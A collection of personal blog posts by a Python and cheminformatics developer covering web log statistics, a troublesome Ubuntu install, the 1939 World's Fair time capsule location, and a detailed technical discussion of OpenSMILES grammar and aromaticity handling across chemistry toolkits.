    I do a lot of work with cheminformatics, but that's the details. In most cases my topic is more general, like how to write a C extension for Python (that just happens to use a chemistry toolkit). The highest cheminformatics specific hit is my article on SMILES tokenization, with 1,500 hits. Most of the links come from Wikipedia's SMILES page. My most popular bioinformatics page is on BLAST parsing at just under 1,400 hits.

    You can easily see that most people who come to my pages are there because of popular topics of the day (LOLPython, wide-finder) or general computing questions (threading, validation, HTML templates, Python, ANTLR). Very few came to my pages for cheminfomatics reasons. Then again, there are very few people doing cheminformatics.

    The top search phrases were:

    Yes folks, 2,000 people came to my site for one image I have of a use case, from a 10 minute presentation I gave at a bioinformatics conference trying to convince people that usability analysis is important. I don't think it had any effect. No one came to my site searching for information on OEChem.

    60% of the pages come from "direct address or bookmarks". 31% came from search engines, and 10% from referrers. The top being lolcode.com, then Pythonware's Daily-URL (probably lolpython), with the already mentioned wide-finder (via the effbot) and ANTLR home page. programming.reddit.com linked to my lolpython page, and the matplotlib cookbook links to my page showing how to use matplotlib without a GUI.

    Lastly, hostname analysis. Who is 207.172.151.225? That's registered to the RCN Corporation and resolved at 207-172-151-225.c3-0.gth-ubr1.lnh-gth.md.cable.rcn.com. They sucked down 780 MB of my 20GB. All to read my RSS file every hour. Whoever it is doesn't know to how to ask for an If-Modified-Since as they are downloading the entire thing (usually unchanged) every time. How do I complain?

    The next hog is NewsAlloy through 207.230.13.10 which has downloaded 450 MB, and makes full requests every 20 minutes. I emailed them this:

    Your RSS reader at 207.230.13.10 , identified as "NewsAlloy/1.1 (http://www.NewsAlloy.com; 1 subscribers)" is taking up 5% of my upload bandwidth. While that's only 400MB/year, the underlying reason is because your service doesn't send the tags needed to handle HTTP conditional get. My server should only need to return a 304 Not Modified for most cases, rather than the 200 Ok (along with over 100K of content). You poll every 20 minutes, so that adds up.

    You would decrease your bandwidth use by quite a bit - perhaps an order of magnitude - by adding support for conditional GET requests. See for example: http://fishbowl.pastiche.org/2002/10/21/http_conditional_get_for_rss_hackers .
    I admit: I do this partially to see what happens. I got an answer within a few hours. They said it shouldn't have happened and asked for more details. Looking into it further I see that whever subscribed via their service unsubscribed a few months ago. NewsAlloy hadn't made a request since then.

    I don't know who uses NewsAlloy. I will say that they had very responsive service.

    Next on the list, at only 6MB is my ISP. This is me checking things on my server, and my home page is my web site. After that is a friend (I recognized the domain name) at 4MB. He's configured his RSS reader to poll every 30 minutes.

    Looking for hosts in my field, I see 2,000 requests hits from a biotech in England. Ah-ha, it's one person, reading this from a machine with "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)". Hi!

    There are 700 page requests from the rest of pharma. 200 from one site (all through Google searches finding my PyDaylight work) and 100 from another site.



    Installing Linux #

    Forenote: Glyph wrote me wondering how I managed to get things so messed up. He wrote

    First, let me tell you how this whole mess is _supposed_ to go. You put in the install disk, it brings up a nice graphical display. It asks you for your target disk - which the installer *does* see. You can then use the full OS (pidgin, gimp, emacs, python, whatever you like) while the installation takes place in the background. There's a menu, which looks like a cell phone "bars" icon, and works more or less like the Airport menu, for setting up wireless. You definitely shouldn't have to type "dhclient3" on the command-line! I've probably installed ubuntu 30 times over the past 2 years, and modulo a few minor problems with nvidia cards giving me distorted resolutions, it has always worked that way.
    I have no idea about the hard drive issue, but it sounds like your post- installation woes were likely caused by using the "server" installation CD instead of the "desktop" one.
    Thinking backwards, that's almost certainly what happened. When I went to the Ubuntu page there was the option of "desktop" or "server" options. I wanted to install servers like Apache and MySQL. I figured a desktop machine is for people who want a web browser and some applications, while I wanted gcc, the unix command-line tools, etc. that I would use when developing servers. Plus, it says that the LTS server version gets a longer support - 5 years instead of 3 for the desktop. (I did not get the LTS version; I'm explaining how I decided to choose 'server' over 'desktop'.) I figured that was the case because the end-user applications change more frequently than the relatively stable development software.

    Nothing on the Ubuntu page described the difference between desktop and server. That's changed. If you look at the page now you'll see that the "desktop" option shows a picture of a laptop, the "server" option shows some rack mounted machines, and there's links for each saying "learn more". This changed about 10 minutes ago because when I started writing this update it still had the old layout. Looking back through archive.org's history, it seems the lack of a "learn more" was an anomaly. Eg, you can see it exists in the snapshots from: 12 June 2007 and 10 Jan 2007. Archive.org lists nothing for since June and now. A-ha! At least for now you can see what used to be on the front page here, or here's a screenshot to show I wasn't being completely an ignoramus:

    Grrrrrrrrr......!


    Pipeline Pilot is a visual dataflow system with a domain focus in computational chemistry. Because of it's very strong marketing background and good technology, it's made a big noise on the small domain I work in. I happen to dislike dataflow systems and think its popularity is a measure of how generally unusable (in the HCI sense) chemistry software is. And again, marketing works.

    Pipeline Pilot is a big scary monster to some of the other vendors. As a result, Knime, which is a dual-licensed free/commercial package from a university group, also with a chemistry focus, is itself getting some attention. A few people have asked me if I've looked at it, and I haven't. But I'm a consultant and perhaps it's something I should know about so people will give me money.

    Which reminds me, I do more than consult for computational chemistry, so if you're looking for an experienced Python developer based in Göteborg, Sweden, email me. (After the fact: but obviously don't hire me as a system administrator :)

    My primary machine is a Mac. I used to have a Thinkpad 600E (or some number like that) which worked out pretty well. I upgraded to a T23 but ended up with lots of programs getting Linux installed on it. My girlfriend at the time, a big Mac fan, helped convince me to get a Mac. I've not looked back sense.

    Sometimes I need to go back. There is after all software that doesn't run on a Mac. One is Knime. It's written Java but there's some conflict between the AWT and the Eclipse SWT that means it doesn't work on my machine. When I visited friends in the US over Thanksgiving I pulled out my old T23 which I had stored in their garage. Perhaps I could use that to run the Linux version.

    I tried to boot it but it didn't find the hard disk. Strange. Wonder if the disk went bad. I took it with my back from the US and since bad contacts are an easy problem to fix I did the first trick of pulling things apart and putting it back together again. Nope. Didn't work.

    I made a install disk for Ubuntu Linux (Fiesty) to see what that would tell me. Went through the first few screens but couldn't find a disk. To be correct, it couldn't figure out which driver to use for the disk. My translation: disk is bad or hardware to the disk is bad. I figured the first case was more likely and went looking for a replacement. First step was to a local computer repair shop. He said (in Swedish as his English wasn't good), "yes, the disk is bad."

    I went to a computer store on Hisingen (that's the island immediately across from downtown) and asked about getting a new hard disk. They didn't have any in stock that would work and suggested I go to another computer store somewhat nearby. He showed me where on the map but I had never been there, it wasn't easy to go to without a car, and it was about 5pm so the sun had set 1.5 hours earlier and I didn't want to hunt around in the darkness. I went home and looked up the place on the map so I could orient myself better.

    It was also on Hisingen, but the bus that way goes only every 30 minutes so it was about a 15-20 minute walk from the Frihamn stop. Got there. It reminded me of a NAPA auto parts place, or of the really good hardware stores. The ones where you go to the desk and say "I want a 8-inch left-handed variable-speed smoke-shifter" and they'll get it for you from the stock room. They had a replacement drive, in 80 GB (the old was 50).

    While I was there I opened the bag, plugged in the machine and ... no go. The machine still didn't see the disk. So it looks like I just wasted money for nothing. I checked - no return policy for this, even though I hadn't even left the store. I then checked with the repairs people, but they don't repair laptops, only desktops. They did give me the name of a place to go to, but I'm thinking the price is getting too much for exploratory research.

    Subscribing to the sunken cost fallacy, can I spend some more money so the money I spent didn't go to waste? Well, I can buy an IDE enclosure so I can get my Mac to connect to the new drive over USB. Plus, the T23 might be see a USB drive. I bought it.

    Started working on that today. (This is now day 3 of the attempt to install Knime.) Whaddaya know, the Ubuntu installer sees the USB disk and I can install onto it. And boot. It's dog slow because everything's going over USB2 and not the IDE bus, but usable. Problem is, there's only a console. I don't have a GUI and can't figure out how to get the wireless working so I can connect to my local base station.

    Strange thing is that I can only get a console interface. Where's X? When I installed there were a bunch of red lines in the output when it tried to connect over the network. Because wireless wasn't working, I had told it I would configure the network later. Perhaps had I had the network going it would have worked better? Or are all Ubuntu installs like this?

    How do I install X? "xinit"? Nope. Though the error message gives me something about using apt to install a package. Tried that out. Red lines. Try "apt" and the various apt-programs. Figured out how to tell it to look at the CD-ROM for files. (Or it knew it already.) Messed around some, got some X client apps installed, but no X server. Do I need to connect to the network for the rest of this?

    Finally gave up, unplugged my Airport Express (I have no router so can only plug one Ethernet cable in.) Nothing. Power-cycled the DSL modem. ifconfig says I've got some network traffic on eth0, but no DHCP. How do you tell Ubuntu/Linux to enable dhcp? Does the network even work? The install disk lets me configure for DHCP so rebooted with that. Yippee! It sees the network, and I can ssh out. But how do make that work with my install. Should I just reinstall from scratch given that I can see the network now? In retrospect I think the answer is "yes".

    There's a program called "dhclient3". Wonder what that does. Run it. Interesting. Looks like .. yes .. I've got a DHCP connection. My "nslookup www" fails instead of timing out. I can see the outside world.

    Worked with "apt" some more and figured out how to get the X server running. "startx" to get into it - and it exists. No window manager found. What does Ubuntu use? Gnome, right? Used apt to install various Gnome parts. Now I can get a system working .. but there's no window manager. I had installed metacity. How do I start it? Where's the terminal? Can't find that, but was able to make a desktop item that starts "/bin/bash" in a terminal. Only to get the message that gnome-terminal wasn't installed.

    At this point I'm in the GUI, "Synaptic Packager Manager" and I install gnome-terminal. That's enough to get a window open where I can type "metacity". Terminal, web browser, and the ability to swap between windows. What more does anyone need?

    For one, a slew of missing programs. A lot of Unix system utilities are missing. Go through Synaptic and toggle the ones that look important. There's an icon by some of them which I think means "part of the normal Ubuntu install". I clicked on that column so I would see them grouped together. After 5 minutes of near 100% CPU use I killed it and started again.

    Toggled on the ones that I thought were useful, and chose ones like OpenOffice that have a lot of dependencies. Install. Time to go out salsa dancing. Came back.

    In various bits of playing around I found the Network Manager and enabled eth0. Tried to enable my wireless but I've forgotten the password. I think I'll just reset it and let it be open. I still haven't figure out how to get Metacity as the initial window manager. And I installed yet more programs. I tried "wicd" as a perhaps easier way to deal with my wireless. It's got a tray control that might be something like what my Mac has. It worked enough to tell me the wireless was working, but then it failed, miserably, with a Python traceback saying it tried to send a Unicode string over DBUS. (Note to self; you've also said you're going to look into DBUS.) I couldn't get it working again.

    In the meanwhile I downloaded Knime. All 170MB or so for the developer's version. This includes code from Eclipse, but it's huge. There's no reason such a program should take so much space, I think. Why, "when I was a kid I had ...." I remember Craig and I being astonished in 1990 when we took an operating system's course and found out that SunOS's kernel was over 1MB. On the other hand, it doesn't take all that long to download. I've got a 2MBit/sec connection here, for the same price as my old sub-1MBit/sec in Santa Fe.

    I should reboot. In addition to getting the network (hopefully) working, I also installed a libc security update. I wonder if I'll get a GUI login. ... Or if it will boot. .... Well, that took a while. Text prompt, then startx, then .. oops, to the terminal to start metacity. Cool, the DNS is working. Go back to the package manager. A-ha! There's a "ubuntu-desktop" option (and a few others) which are virtual packages that load all of the dependencies. Looks like I'm missing a lot of files. *sigh*

    While that's happening I did get Eclipse/Knime started. The first line in the README is .. "update the Knime installation."

    Why am I writing this now? I'll skip the obvious Mac vs. Linux comparisons. The Ubuntu people are working on a really hard problem that Mac doesn't have because Apple controls the platform. A question is, should I be proud happy, excited or otherwise joyous that I managed to get all of this working? It was a lot to figure out on my own and there's many who wouldn't have gotten it, or would have given up, or would have (as I should have), just reinstalled and seen if that improved things.

    In looking up some of the network problems I found several which had step-by-step walkthroughs of the installation process, and even one which had a video clip of a guy talking about the installation and suggestions for what to install afterwards. That's where I got the pointer to wicd. Yet it feels like the same problem I have when I buy a new computer. The field changes so much and I don't pay enough attention to it so that the knowledge gained doesn't really help for the next time.

    There are people who like tracking hardware and OS information. I'm more at the application level, and do that myself with APIs and libraries and web interfaces. Which means I feel these last three days was almost a complete waste. I like being able to ignore things I don't care about. Linux feel more written for those who care about things I don't.

    I hope the Knime investigation is worth it. There are a couple of other things I'm thinking to do with an extra Linux machine, so this isn't the only reason, just the driving one. But perhaps serendipity will strike with the others.

    P.S. It's now the next day from when I wrote that. Everything's downloaded, installed (except some acp things that Synaptic said didn't install correctly and were removed; and Eclipse demanded interaction when looking for a mirror when I wanted to let it go overnight while I slept so I had to finish that off this morning) and working. I haven't yet checked to see if get a graphical login after reboot, or working window manager. What I've got is good enough. I'll say it again - working from a USB2-based drive is mind numbingly slow.



    Time capsule #

    Came across this link on BoingBoing about a film about the 1939 World's Fair. It's The Middleton Family at the New York World's Fair" and available through archive.org. I watched some of it. Can't say it was worthwhile.

    One of the things it mentioned was the time capsule buried then, to be opened in 5,000 years. The term time capsule was invented specifically for it, though the practice is older. How will the people of the year 6939 know about the time capsule? One way was to publish a book, with copies sent to libraries and archives around the world, titled The Book of Record of The Time Capsule. On acid free paper that should last a long time, with copies distributed widely, in the hopes that in the deep future someone will come across it and think to find and open the capsule.

    I read part of the book. It's in the somewhat florid style of the time, which I think gets its influence from oratory.

    By A.D. 6939, it is probable, all present-day landmarks, city surveys, and other such aids for locating such an object will have disappeared. The spot may still be discovered, however, by determination of the latitude and longitude. The exact geodetic coordinates [North American Datum of 1927J are :
        Latitude 40° 44' 34". 089 north of the Equator 
        Longitude 73° 50' 43".842 west of Greenwich
    

    I'm writing this only 68 years in the future. There are people still alive who were at that fair. I could find the capsule's location in many ways, but I decided to use the lat/long. Using Google maps I see it's in Flushing Meadows Park, which is also where other sources say it is. But it's very close to some limited access roads and doesn't appear to be anything at the spot.

    We no longer use the North American Datum of 1927. I converted from NAD27 to NAD83 to get 40° 44' 34.45671" N by 73° 50' 42.32593" W, which is a shift of 37.289 meters. Bingo! Arrow marks the spot.



    OpenSMILES and aromaticity #

    (All you all reading this from a Python blog, this is what a detailed discussion of chemical informatics software looks like :)

    SMILES [in Wikipedia] has a long and venerable history in chemical informatics. It's a line notation, which means it's a way of representing some aspects of a molecular structure as a line of text. For details take a look in my archive and read the essays between "Drawing Molecules" and "Computers -- History of Chemical Nomenclature."

    There are three primary documents regarding how to intepret SMILES: the original Weininger paper in JCICS, 1988; the Daylight web site; and the Weininger article in "The Chemoinformatics Handbook", edited by Gastieger. The original paper is somewhat obsolete as it does not include the relatively new field for atom class number. The web site should be the most authoritative of these documents. All are useful in providing insight into how to use SMILES.

    What's wrong with the current SMILES definition(s)?

    From an implementation viewpoint, the specification lacks some essential detail. The grammar is mostly defined in English rather than using a more formal langauge like BNF. Take for example the definition for an atom inside of square brackets, which is a BNF:

    atom     		:	SYMBOL
    			|	[ WEIGHT SYMBOL mods ]
    			|	[ WEIGHT SYMBOL mods : CLASS ]
    			;
    mods                    :       mod mods
    			;
    mod                     :       HCOUNT | CHARGE | CHIRAL
     			;
    
    CLASS = non-negative integer class value.
    WEIGHT = atomic weight.
    SYMBOL = atomic symbol.
    HCOUNT = Atom hydrogen count specification.
    CHARGE = Atom charge specification.
    CHIRAL = Atom chirality specification.
    
    Nowhere in the BNF nor the English does the specification say that the weight, the mods and the CLASS field are optional. That's only inferrable from the examples, and it would be nice if that was explicit. The grammar implies that the mods can be in arbitrary order, which Daylight accepts, but the grammar also implies that a mod can be present multiple times, which Daylight rejects. As it turns out, all SMILES I've ever seen are given in the order CHIRAL, HCOUNT, CHARGE and I would prefer that that order be preferred, even to the exclusion of allowing other forms. (Excepting perhaps some compatibility mode.)

    There's ambiguity in other parts. Is the empty string a valid SMILES? According to the "Reaction SMILES Grammar":

    reaction		:	reactant '>' agent '>' product
    			|	reactant '>>' product
    			;
    reactant,
    agent,
    product			:	molecule
                            |       <null>
    			;
    molecule		:	SMILES
    			;
    
    This implies that SMILES is not null. I think it should be allowed. The Daylight toolkit does not, but PyDaylight wrapper I wrote on top of the Daylight toolkit does. Note: the SMILES file format does not handle empty SMILES. I find that limitation perfectly acceptable.

    Allowing the empty string has other implications, especially related to dot disconnects. Is ".C" allowed? What about "C..C"? The Daylight spec specifically says that dot only applies to "adjacent atoms". However, it doesn't say if "C(=C)(.C)" is allowed or not. After all, in that case the "." is not between adjacent atoms. For that matter, the only way to find out what's allowed inside of the parenthesis is by looking at the examples in the spec and inferring. Nothing in spec mentions the "(.C)" case. But the Daylight toolkit as well as others allow it, and the result is the same as "C=C.C".

    Roger Sayle some years back did a thorough analysis of how different toolkits interpret SMILES. OpenEye's toolkit is pretty promiscuous and that table shows that it supports strings which I don't consider to be valid SMILES strings, like "C1CC(1)" and "C(C)1CC1". If you try out the toolkit you'll see that even in strict mode it accepts "C-=C" and interprets it as "C=C" while swapping the bonds yields "CC" - last bond wins. I don't like promiscuity in strict mode for the same reason browser authors don't like having to deal with bad HTML meant to hack around bugs in Netscape.

    OpenEye doesn't fully define what it means to be a valid SMILES string for them. They point to Daylight's page and list the extensions they support, but as I just showed they allow strings which most would say are not valid SMILES.

    Other toolkits also have extensions to SMILES: Open Babel has a radical notation, and RDKit has special atoms for attachement points, though they would rather now use the atom class in the more recent Daylight SMILES definition. Perhaps the most common extension is to allow more "aromatic" element types, such as aromatic silicon.

    I'm not saying that a toolkit shouldn't have some provision to do a best-guess at how to fix an invalid SMILES string, just like web browsers do some cleanup of invalid HTML. But if the ambiguities are never resolved then how does anyone know what is "correct" vs. "cleanup"? If Open Babel wants to implement the OpenEye SMILES, should it be compatible with all of OpenEye's cleanup code as well? Down that way lies madness. Someone who is the right sort of mad could develop a syntax-level tool that does to SMILES what HTML Tidy does to HTML; convert a somewhat invalid SMILES into a valid one, but that effort should not be required in everyone who wants to implement SMILES.

    OpenSMILES

    The OpenSMILES effort started as a way to resolve these ambiguities, with the hopes that the different open source projects, and perhaps closed ones as well, would switch to that definition. This would help make the open source projects more compatible, so that SMILES is interpreted the same across the different platforms. Craig James has taken the lead in writing the spec and organizing the feedback.

    My hope too is that such a specification could even deprecate parts of SMILES, mostly support for charges as "[C--]" and instead use "[C-2]." The spec should also provide guidance about how to generate SMILES output, most specifically that a single bond between two aromatic atoms must be written as an explicit "-".

    I contributed a BNF grammar for my interpretation of SMILES. As far as I know, no one has reviewed it and implemented it themselves. I wouldn't be surprised as BNF grammars aren't part of what most computational chemists learn. That's why I write essays describing how it works. :) Still, before this specification is complete I would like to see one or two other people use the grammar to implement their own parser. Else I don't think it's been tested enough.

    I also wrote a lot of commentary on the mailing list.

    Others have posted to the list as well, with different viewpoints. Some want OpenSMILES to be the new de facto group in charge of SMILES. I'm happy to let Daylight keep the keep the lead in that. As I've stated, I'm more of a descriptivist than a proscriptivist.

    Some want to extend SMILES to support new types of chemistry. There are well-known limitations in SMILES, many of which are due to its assumption of the valence bond model. General consensus though is to develop a specification for SMILES as it's used now.

    Aromaticity

    The most difficult problems have been with aromaticity. Aromaticity has no real definition. Different subfields have different definitions. Quoting from Weininger's Wiley article, which starts off a bit tounge-in-cheek:

    What does aromatic mean anyway? "Aromatic" means "it smells nice." No kidding, that is the only defensible definition. There is no single rigorous definition of aromticity in chemistry. To a synthetic chemist, aromaticty implies something about reactivity, to a thermodynamicist about heat of formation, to a spectroscopist about NMR ring current, to a molecular modelist about geometrical planarity, to a cosmetic chemist it probably means "smells nice." The SMILES definition of aromaticity has nothing to do with the other definitions, except that we would all agree that benzene is "aromatic".
    It then goes on to say that SMILES "was specifically designed to be 'canonicalizable'... This implies a fundamental requirement to express the symmetry of a molecule correctly." Sounds like a very nice goal, but how to do it?

    To keep from using the highly loaded work "aromatic", I'll call the Daylight solution "Hückelicity". Find the smallest set of smallest rings (SSSR). For each ring check that all atoms are "sp2 hybridized and the number of available 'excess' π-electrons ... satisfy Hückels 4N+2 criterion." Continuing to quote from Weininger's Wiley article:

    The rules become slightly more complicated for heterocycles. Oxygen and sulfur can share a pair of π electrons. Nitrogen can also share a pair, if three-connected as in [nH]1cccc1 methylpyrrold, otherwise sp2 nitrogen shares just one electron (as in n1ccccc1 pyridine). An exocyclic double bond to an eletronegative atom "consumes" one shared π-electron, as in O=c1ncccc1 2-pyridone or O=c1oc2ccccc2cc1 coumarin. But that's is about it. Add up the electrons in rings (and ring systems, such as azulene); if they meet the 4N+2 criterion, it is "aromatic".

    This definition might make sense to a chemist, but I want to see a definition which is more algorithm based. Once I've found the SSSR, how do I figure out which are sp2? How do I count the number of excess π electrons in the ring? What are the electonegative atoms? How do I handle "*"? Is c1c*ccc1 considered valid and aromatic, as per the Daylight spec? (OpenEye does not support it.) What about *1*****1?

    The goal of Daylight is to make canonical SMILES. They use it for database searching. Canonicalness is built into their toolkit such that there's no way to have a valid ("mod is off") molecule which disagrees with their Hückelicity model. All molecules that come in get reinterpreted to fit this definition. For example, if the input structure is c1ccc1, which is not aromatic by the Hückel definition, then it will get reinterpreted to C1=CC=C1.

    OpenEye adds a new perspective into parsing SMILES strings. The have a molecular graph which expresses the valence bond model but they do not enforce a strong chemistry model. "aromatic" is little more than a boolean flag. Instead of doing the full Hückelicity perception they do the less complicated and faster Kekulé perception. After converting the SMILES string to the molecular graph it verifies that the aromatic bonds have a self-consistent assignment to single or double bond. Multiple solutions may exist; the only criterion is that one exists.

    (As an aside, the current implementation only verifies that bond assignment can be done. It doesn't check that each aromatic atom has an aromatic bond.

    >>> mol = OEMol()
    >>> OEParseSmiles(mol, "c-1-c-c-c-c-c1")
    True
    >>> OECreateCanSmiString(mol)
    'c-1-c-c-c-c-c1'
    >>> 
    
    This is probably a bug. 2007/12/01:This is a deliberate choice by OpenEye to keep the aromaticity expressed in the original SMILES. Or at least another corner case that should be pinned down.)

    With this approach, "aromaticity perception" is simple - it's what's specified in the SMILES, verified for self-consistency. Because different people have different ideas of what "aromatic" means, it's also best that a toolkit provide algorithms to reinterpret the aromaticity, and better yet, to provide multiple algorithms, which the default being the preferred one. OpenEye does exactly this in OEAssignAromaticFlags, which implements the Daylight, Tripos, MMFF and MDL definitions.

    Open Babel and CDK follow the Daylight approach. They reperceive Hückelicity on all input structures. I've been advocating that reperception is not an essential part of the requirement for parsing SMILES strings, and this essay is part of my argument.

    Several of the people have been against this, saying that without full reperception there's no way to do valid chemistry, and that all toolkit should reperceived in order to ensure that all compounds are interpreted the same way. I point out that OpenEye is a pretty big real-world existence proof to counter the first objection, and if doing a SMILES to MDL or Tripos format conversion then the perception should use the algorithms for those formats, and not for Daylight.

    One of the participants has an very different objection. He wants a different interpretation of what lower case symbols means in a SMILES string. His very simple and easy to understand definition is "lower the implicit hydrogen count by one." This makes it easier to support radicals but is incompatible with how current SMILES systems work.

    For examples: c1ccccc1 is currently the same as [cH]1[cH][cH][cH][cH][cH]1 but is not the same as [CH]1[CH][CH][CH][CH][CH]1. (The latter is not chemically realistic.) It's incompatible with SMARTS that use aromatic terms, except by doing the full reperception. And without guidance on how to generate the output, an input SMILES of [NH2] might easily be turned into the radical form n, which is not supported by any existing SMILES parser.

    Without knowledge of how much and what kinds of SMILES will break, I just can't agree with an untested reinterpretation of SMILES.

    Followup to Rich Apodaca

    Rich Apodaca wrote an article titled "SMILES and Aromaticity: Broken?" It refers to this ongoing discussion in the OpenSMILES list. Here are my comments to that posting.

    SMILES is not a relic of the 80s

    In the section "A Little About SMILES", Rich correctly mentions the original reason for SMILES, which as I understand it was to simplify structure input for the work that Weininger was doing at the EPA. SMILES is much easier than WLN, could be inputted by non-specialists with only a few hours of training, and did not require a graphical entry system.

    A mark of a useful system is if it's easily repurposed to other tasks. SMILES is useful for more than data entry. In addition to being simple to enter, it takes up less space. Storage space on corporate machines in the 1980s was more than "kilobytes". In 1988 I had a 30MB hard drive in my PC. Other chemistry systems used that disk space to store connection table formats, which are easier to parse than SMILES but not as compact. What made Daylight successful was the ability to store structures in-memory using SMILES so there was no need for storage. Everything could be done in-memory. Without disk seeks, searches become 100x or 1000x faster.

    That's still an advantage to this day, and nothing to do with machines in the 1980s being "toys". As of 18 November 2007 Pubchem had 11 million compounds. Assuming 50 bytes per SMILES including a unique key means the entire data set can be held in memory in about 0.6 GB. 50 bytes is smaller than storing the parsed data structure, so if you can parse SMILES really fast then it's better to keep the SMILES in memory and rebuild the data structure when needed instead of doing the page swap or disk read needed to bring it in from disk. CPUs are fast, and doing more work can be a valid trade-off over doing a memory fetch, which is about 100 cycles. Doing a disk read is several orders of magnitude slower still. Daylight and OpenEye have really fast parsers, because those developers come from this mindset. Open Babel and CDK do not.

    (Added 2007/12/02: Craig James commented that canonicalization was an essential part of the success of SMILES. WLN's canonicalization was, as I recall, "use the shortest WLN" and implemented by a combination of rules of thumb and search that didn't guarantee the best solution. Daylight's successful canonicalization algorithm meant that exact structure search could be done as a very fast table lookup, which Craig points out meant the EPA could "keep track of this data on a modest VMS computer.")

    Roger Sayle, who did the comparison of how different parsers interpret SMILES, wrote that table when it worked at Metaphorics, which was a sister company to Daylight. He and Dave worked on a compression algorithm and to Dave's surprise, parsing from compressed SMILES was faster than from uncompressed SMILES, because the bandwidth to the disk was such that the differential savings in disk read more than made up for the extra work needed to decompress the SMILES.

    SMILES remains popular amoung computational chemists because it is small. It can be used in a spreadsheet cell, added as a field in an SD file, and easily passed in on the command-line. A connection table format like an SD file cannot. It's easy to parse and generate by hand (which InChI is not) for those rare times when that's needed. It's flexible, so can be used for simple combinitorial library generation and stranger hacks.

    BTW, the MDL file formats are also a well-published de facto standard. I have the multipage document describing the format somewhere on my hard drive, which I downloaded from the MDL site for free.

    Interpreting c1ccc1; a two part scheme

    Rich points out that Daylight supports "c1ccc1" as a valid input structure, and converts it to "C1=CC=C1" despite that the input structure does not obey Hückel's 4N+2 rule. He asks how that can be.

    My belief is that it's a two part resolution. The first is to convert the structure into a Kekulé form. It doesn't matter which one (and this causes breakage later on). The second is to use the Kekulé structure as the base for aromaticity perception. This interpretation is compatible with the Daylight behaviour, which does both steps. Leaving out the second step gives the OpenEye behaviour. (As I mentioned earlier, OpenEye does not enforce a given aromaticity interpretation.)

    Rich quotes Weininger 1988:

    Entries of c1ccc1 and c1ccccccc1 will produce the correct antiaromatic structures for cyclobutadiene and cyclooctatetraene, C1=CC=C1 and C1=CC=CC=CC=C1, respectively
    then goes on to assume there's some underlying but unclarified concept of "antiaromaticity" in the Daylight toolkit. I think Rich makes the assumption that Dave's comment is truly correct, when I think it's a surface coincidence. Yes, I think Dave was wrong when he wrote that about 20 years ago.

    As a counterexample, tag each of the atoms with an isotopic number. [10cH]1[11cH][12cH][13cH]1. Better yet, tag it two different ways, as [10cH]1[11cH][12cH][13cH]1.[11cH]1[12cH][13cH][10cH]1. These structures are identical, right?, and should be displayed the same in any program which understand the original chemistry rather than reinterpreting it. Here's what Daylight's depict does to it:


    You can see that the bond between 10C and 13C in the first is a double and in the second is a single. The Daylight toolkit breaks the symmetry in such a way that the initial atom ordering produces different canonical SMILES. This is because the initial SMILES (2007/12/02: the input SMILES submitted to Daylight for analysis) uses a (probably incorrect) aromaticity model which assumes that cyclobutadiene is aromatic. Daylight's model doesn't, but because of underlying symmetries in the molecule you can't tell that there's a problem if you only look at the non-isotopic SMILES in the original paper.

    For comparison, here's OpenEye's OEChem on the same topic:

    >>> mol = OEMol()
    >>> OEParseSmiles(mol, "[10cH]1[11cH][12cH][13cH]1")
    True
    >>> OECreateIsoSmiString(mol)
    '[10cH]1[11cH][12cH][13cH]1'
    >>> OEAssignAromaticFlags(mol)
    >>> OECreateIsoSmiString(mol)
    '[10CH]1=[13CH][12CH]=[11CH]1'
    >>> 
    >>> mol = OEMol()
    >>> OEParseSmiles(mol, "[11cH]1[12cH][13cH][10cH]1")
    True
    >>> OECreateIsoSmiString(mol)
    '[10cH]1[11cH][12cH][13cH]1'
    >>> OEAssignAromaticFlags(mol)
    >>> OECreateIsoSmiString(mol)
    '[10CH]1=[11CH][12CH]=[13CH]1'
    >>> 
    
    Notice how OpenEye does not by default assert its chemistry model on the system, so that parsing preserves the original aromatic assignment? Assuming the aromaticity was correct lets OEChem generate a correct canonical SMILES for that system. But since the structure does not have a Hückel form, the aromaticity assignment must break the symmetry, which is why the post-assignment canonical SMILES are different. And it's why ultimately the user must be responsible for deciding which aromaticity model to use.

    I forced the problem by using isotopes, but here's an example without them:

    c12c3c4c1.C2=O.S3.C4O
    c14c3c2c1.C2=O.S3.C4O
    
    I wrote this in a strange way (one of the nice hacks you can do with SMILES) to emphasize the similarities between them. The only differences are in the ring closure numbers in the ring term. The result, according to Daylight, is

    Daylight breaks the original symmetry. The fact that Dave is correct for cyclobutadiene is mostly a coincidence. Daylight's acceptance of c1ccc1 is almost certainly because they convert the input to Kekulé form before doing aromaticity perception, which is then used for depiction. Therefore there's no contradiction with quinone represented as non-aromatic. By Daylight's rules, it's not.

    BTW, if you give Daylight's depict O=c1ccc(=O)cc1 which asserts that quinone is aromatic, it will display the result in non-aromatic form. OpenEye accepts it as well. Then again, both toolkits accept c1cccCC1, which I wouldn't consider as valid, and Daylight depicts it as C1C=CC=CC1.

    Followup to some questions of Egon

    Egon Willighagen in a blog post pointed out the CDK definition of aromaticity, which he wrote. In the latter he makes the argument that lower case is the same as sp2 hybridized and asks some questions:

    1. Why use Hueckle detection if lower case does it already?
      Because different systems and different people have different ideas of what it means to be aromatic. Daylight's philosophy is to reintepret all SMILES using their own definition. This is not always appropriate; eg, read SMILES but generate Tripos mol2 files, or read two SMILES each generated from a different chemistry program and verify that they implement the same aromaticity perception algorithm. Can't do that comparison if you reinterpret all input.
    2. So lower case would mean 'aromatic OR anti-aromatic'
      I think it means "make sure you can generate a Kekulé structure." I haven't figure out what's entailed by that, and it may be the same as "aromatic OR anti-aromatic." However, Daylight and OpenEye allow all of c1ccccCCC#CCCccc1, c1ccccCCC=CCCccc1, c1ccccCCC-CCCccc1 and c1ccccCCC.CCCccc1. So it's perhaps nothing to do with anti-aromatic, and more likely just bond type assignment.
    Maybe the definition is to say "they are sp2." I just want a more concrete, algorithm-oriented and written down way to figure out which SMILES strings are valid and how to do bond type assignment based on aromaticity in such a way that the result is closely compatible with OpenEye. Say, less than 99.9% of the compounds differ, up to isomorphism, when doing round-trip processing of entires from PubChem, which uses OEChem under the covers. Some specification that I or others can easily translate to code, and be able to compare the results to each other, without having to make a lot of guesses.

    OpenEye's interpretation

    I emailed Roger Sayle at OpenEye about how their toolkit interpets "cc". What rule do they use? He responded, saying I was free to pass his answer on.

    Basically, the lowercase letters in input SMILES mean sp2 conjugated rather than aromatic, and so can appear as annotations on acyclic atoms. Hence, Daylight allows "cc", "cccc" and "cccccc" but not "c", "ccc" nor "ccccc" etc...

